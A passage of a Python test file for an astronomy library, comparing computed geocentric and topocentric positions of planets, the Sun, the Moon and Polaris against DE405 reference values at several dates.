compare(ra.hours, 12.061052547705433, 0.001 * ra_arcsecond)
compare(dec.degrees, 0.37749969290358576, 0.001 * arcsecond)
def test_uranus_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 18.622417009295177, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.668551452013403, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.437331340689163, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.668859170516964, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.437016930580615, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.65936113308538, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.447681812488984, 0.001 * arcsecond)
def test_uranus_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 20.727159134679393, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 21.165586867541418, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.018831731314233, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 21.165269485049027, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020267168405784, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 21.164987614252272, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.020320613172004, 0.001 * arcsecond)
def test_uranus_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, 19.234768680195387, 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 0.4891643148564316, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.3565095329111823, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 0.4894463256538988, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.358369638516312, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 0.5005500654503398, 0.001 * ra_arcsecond)
compare(dec.degrees, 2.429779341040803, 0.001 * arcsecond)
def test_uranus_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.uranus(jd)).position.au)
compare(distance * OLD_AU, (18.75197906203834, 18.622417009295177, 20.727159134679393, 19.234768680195387), 0.5 * meter)
astrometric = e.observe(de405.uranus)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.087167068351334, 18.668551452013403, 21.165586867541418, 0.4891643148564316), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20723926118363256, -23.437331340689163, -17.018831731314233, 2.3565095329111823), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.087010426255667, 18.668859170516964, 21.165269485049027, 0.4894463256538988), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.20832526777272883, -23.437016930580615, -17.020267168405784, 2.358369638516312), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.061052547705433, 18.65936113308538, 21.164987614252272, 0.5005500654503398), 0.001 * ra_arcsecond)
compare(dec.degrees, (0.37749969290358576, -23.447681812488984, -17.020320613172004, 2.429779341040803), 0.001 * arcsecond)
def test_neptune_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 29.83221264621946, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.637210587139663, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.67999613660563, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.63739098768298, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.68045373026462, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.608486730597075, 0.001 * ra_arcsecond)
compare(dec.degrees, -17.583793285519313, 0.001 * arcsecond)
def test_neptune_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 29.490001740438892, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 19.03623522579387, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.792864018500975, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 19.036513633320563, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.79251066237039, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 19.02716408230529, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.808047913986808, 0.001 * arcsecond)
def test_neptune_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 31.024491920354496, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 20.362841834121518, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21242523937633, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 20.362475439010588, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.213645950878377, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 20.36218815756048, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.21323379889766, 0.001 * arcsecond)
def test_neptune_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, 28.984118029716345, 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 22.252468120719442, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.504657215501584, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 22.252825961036415, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.50264948264589, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 22.2643158309744, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.437330191299896, 0.001 * arcsecond)
def test_neptune_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.neptune(jd)).position.au)
compare(distance * OLD_AU, (29.83221264621946, 29.490001740438892, 31.024491920354496, 28.984118029716345), 0.5 * meter)
astrometric = e.observe(de405.neptune)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (15.637210587139663, 19.03623522579387, 20.362841834121518, 22.252468120719442), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.67999613660563, -21.792864018500975, -19.21242523937633, -11.504657215501584), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (15.63739098768298, 19.036513633320563, 20.362475439010588, 22.252825961036415), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.68045373026462, -21.79251066237039, -19.213645950878377, -11.50264948264589), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (15.608486730597075, 19.02716408230529, 20.36218815756048, 22.2643158309744), 0.001 * ra_arcsecond)
compare(dec.degrees, (-17.583793285519313, -21.808047913986808, -19.21323379889766, -11.437330191299896), 0.001 * arcsecond)
def test_pluto_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 32.312971776632494, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.015311208821212, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.620557180992588, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.01514128380381, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.622990160668607, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 11.989232654068259, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.792242650891875, 0.001 * arcsecond)
def test_pluto_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 28.707485955458118, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 15.216302246424346, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3346560528819575, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 15.216661036271791, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3358630622052712, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 15.208581663980876, 0.001 * ra_arcsecond)
compare(dec.degrees, -1.3022394883151638, 0.001 * arcsecond)
def test_pluto_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 31.064412196006614, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.761873062250743, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39643313463007, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.761526675406767, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.396301545071504, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.761277438459963, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.39428873441123, 0.001 * arcsecond)
def test_pluto_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, 31.69909782133193, 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.488351288595236, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.55219099488885, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.488573622605898, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.551729414764313, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.501338273669152, 0.001 * ra_arcsecond)
compare(dec.degrees, -19.541227909743732, 0.001 * arcsecond)
def test_pluto_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.pluto(jd)).position.au)
compare(distance * OLD_AU, (32.312971776632494, 28.707485955458118, 31.064412196006614, 31.69909782133193), 0.5 * meter)
astrometric = e.observe(de405.pluto)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.015311208821212, 15.216302246424346, 16.761873062250743, 18.488351288595236), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.620557180992588, -1.3346560528819575, -11.39643313463007, -19.55219099488885), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.01514128380381, 15.216661036271791, 16.761526675406767, 18.488573622605898), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.622990160668607, -1.3358630622052712, -11.396301545071504, -19.551729414764313), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (11.989232654068259, 15.208581663980876, 16.761277438459963, 18.501338273669152), 0.001 * ra_arcsecond)
compare(dec.degrees, (16.792242650891875, -1.3022394883151638, -11.39428873441123, -19.541227909743732), 0.001 * arcsecond)
def test_sun_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0160878650466754, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 8.03008088792976, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.496475643233936, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 8.02969030304998, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.497605463260726, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 8.000108116572395, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.58493093599605, 0.001 * arcsecond)
def test_sun_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0118605934887042, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 3.776110727862678, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.907832379364574, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 3.775721385487214, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.906601181542, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 3.7666292045824337, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.879173772309745, 0.001 * arcsecond)
def test_sun_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 0.9833276788862821, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 18.752544254682526, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.033309607967187, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.752126228091367, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03376015263556, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.75183797477899, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.032488638722818, 0.001 * arcsecond)
def test_sun_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, 1.0107820040799866, 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 10.268162490439073, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.751933902906119, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 10.267805651450434, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.753946960547603, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 10.279264504672039, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.688507865341325, 0.001 * arcsecond)
def test_sun_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.sun(jd)).position.au)
compare(distance * OLD_AU, (1.0160878650466754, 1.0118605934887042, 0.9833276788862821, 1.0107820040799866), 0.5 * meter)
astrometric = e.observe(de405.sun)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (8.03008088792976, 3.776110727862678, 18.752544254682526, 10.268162490439073), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.496475643233936, 19.907832379364574, -23.033309607967187, 10.751933902906119), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (8.02969030304998, 3.775721385487214, 18.752126228091367, 10.267805651450434), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.497605463260726, 19.906601181542, -23.03376015263556, 10.753946960547603), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (8.000108116572395, 3.7666292045824337, 18.75183797477899, 10.279264504672039), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.58493093599605, 19.879173772309745, -23.032488638722818, 10.688507865341325), 0.001 * arcsecond)
def test_moon_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0026034424248854585, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 12.472463241145173, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.546618838170065, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.472340287066462, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.545964408923231, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.446262111681095, 0.001 * ra_arcsecond)
compare(dec.degrees, -4.378227942512158, 0.001 * arcsecond)
def test_moon_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0024815092296598847, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 23.676443817409496, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.8587554901327035, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.676289920709518, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.857413875990142, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.66827809687387, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.8051891857266409, 0.001 * arcsecond)
def test_moon_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.002690202988513297, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 14.830020573942235, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.900635500943373, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 14.829807890359675, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.90012775884129, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 14.829573271760747, 0.001 * ra_arcsecond)
compare(dec.degrees, -10.897905576904787, 0.001 * arcsecond)
def test_moon_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, 0.0024739078649309238, 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 16.39102815233177, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.93676001523414, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.39106196861365, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.936774891979848, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.40383113143219, 0.001 * ra_arcsecond)
compare(dec.degrees, -20.96508913558473, 0.001 * arcsecond)
def test_moon_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
distance = length_of((e - de405.moon(jd)).position.au)
compare(distance * OLD_AU, (0.0026034424248854585, 0.0024815092296598847, 0.002690202988513297, 0.0024739078649309238), 0.5 * meter)
astrometric = e.observe(de405.moon)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (12.472463241145173, 23.676443817409496, 14.830020573942235, 16.39102815233177), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.546618838170065, 1.8587554901327035, -10.900635500943373, -20.93676001523414), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.472340287066462, 23.676289920709518, 14.829807890359675, 16.39106196861365), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.545964408923231, 1.857413875990142, -10.90012775884129, -20.936774891979848), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.446262111681095, 23.66827809687387, 14.829573271760747, 16.40383113143219), 0.001 * ra_arcsecond)
compare(dec.degrees, (-4.378227942512158, 1.8051891857266409, -10.897905576904787, -20.96508913558473), 0.001 * arcsecond)
def test_polaris_geocentric_date0():
jd = JulianDate(tt=2440423.345833333)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5283697499529345, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.2642084845529, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.52280149297809, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.25882879505869, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.0385816433557173, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.11999387030946, 0.001 * arcsecond)
def test_polaris_geocentric_date1():
jd = JulianDate(tt=2448031.5)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5296910275944064, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26413894692217, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.503356852811078, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26201007627152, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.3329211805288432, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.22082922133737, 0.001 * arcsecond)
def test_polaris_geocentric_date2():
jd = JulianDate(tt=2451545.0)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.5302921882000127, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26411027119273, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.544633215462727, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26917874902797, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.5459982729094564, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26697328449004, 0.001 * arcsecond)
def test_polaris_geocentric_date3():
jd = JulianDate(tt=2456164.5)
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, 2.531117065610149, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26406906493733, 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.541609533735535, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.25923373182651, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.8064741334456413, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.3136939266471, 0.001 * arcsecond)
def test_polaris_geocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
e = de405.earth(jd)
star = starlib.Star(ra_hours=2.530301028, dec_degrees=89.264109444,
ra_mas_per_year=44.22, dec_mas_per_year=-11.75,
parallax_mas=7.56, radial_km_per_s=-17.4)
astrometric = e.observe(star)
ra, dec, distance = astrometric.radec()
compare(ra.hours, (2.5283697499529345, 2.5296910275944064, 2.5302921882000127, 2.531117065610149), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.2642084845529, 89.26413894692217, 89.26411027119273, 89.26406906493733), 0.001 * arcsecond)
apparent = astrometric.apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (2.52280149297809, 2.503356852811078, 2.544633215462727, 2.541609533735535), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.25882879505869, 89.26201007627152, 89.26917874902797, 89.25923373182651), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (2.0385816433557173, 2.3329211805288432, 2.5459982729094564, 2.8064741334456413), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.11999387030946, 89.22082922133737, 89.26697328449004, 89.3136939266471), 0.001 * arcsecond)
def test_mercury_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 7.9049140222444105, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.33276016366845, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 7.874898511438327, 0.001 * ra_arcsecond)
compare(dec.degrees, 22.415294637224765, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 46.3212267566032, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 46.33688339908365, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 46.33704240110901, 0.001 * arcsecond)
compare(az.degrees, 262.18590521567705, 0.001 * arcsecond)
def test_mercury_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 2.469959592064856, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.24594905426479, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 2.461508188066483, 0.001 * ra_arcsecond)
compare(dec.degrees, 11.205182598299666, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -17.340667089884377, 0.001 * arcsecond)
compare(az.degrees, 300.9176579181716, 0.001 * arcsecond)
def test_mercury_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.138603904058247, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.421550562485436, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.138318996641566, 0.001 * ra_arcsecond)
compare(dec.degrees, -24.420003066967503, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -0.12765060376706572, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 0.36890915770104016, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 0.3731892291678349, 0.001 * arcsecond)
compare(az.degrees, 121.97764361867154, 0.001 * arcsecond)
def test_mercury_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.mercury).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 9.29546814256182, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.68590812465023, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 9.307459135231527, 0.001 * ra_arcsecond)
compare(dec.degrees, 16.630243128506475, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -9.116616855755964, 0.001 * arcsecond)
compare(az.degrees, 300.1420264373104, 0.001 * arcsecond)
def test_mercury_topocentric_date4():
